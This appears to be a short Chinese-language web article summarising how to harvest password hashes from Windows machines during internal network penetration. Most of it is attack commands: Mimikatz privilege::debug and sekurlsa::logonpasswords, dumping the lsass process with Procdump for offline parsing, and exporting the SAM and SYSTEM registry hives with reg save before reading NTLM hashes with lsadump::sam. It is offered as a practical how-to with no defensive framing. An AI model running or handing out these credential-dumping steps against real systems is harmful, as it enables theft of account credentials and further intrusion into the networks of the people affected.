內(nèi)網(wǎng)滲透—獲取Windows內(nèi)Hash密碼方法總結
1、直接讀取
Mimikatz讀取明文密碼和hash時需要管理員權限。
privilege::debug //提升至debug權限
sekurlsa::logonpasswords //抓取密碼
2、Procdump+Mimikatz離線讀取lsass.dmp文件
Procdump是微軟官方發(fā)布的工具,可以用來將目標lsass文件導出。先在目標機器上上傳Procdump,導出lsass.dmp
procdump64.exe-accepteula-ma
lsass.exe lsass.dmp
將目標機上的lsass.dmp下載到本地后,執(zhí)行Mimikatz導出lsass.dmp里面的密碼和hash:
sekurlsa::minidump 目錄lsass.dmp //將導出的lsass.dmp載入到Mimikatz中
sekurlsa::logonpasswords full //獲取密碼
3、通過SAM和System文件抓取密碼和Hash
首先利用注冊表命令將目標機的sam或者system文件導出
reg save hklmsam sam.hive
reg save hklmsystem system.hive
然后將目標機上的sam.hive和system.hive下載到本地,利用Mimikatz讀取sam和system文件獲取NTLMHash:
token::elevate
lsadump::sam

請輸入評論內(nèi)容...
請輸入評論/評論長度6~500個字
圖片新聞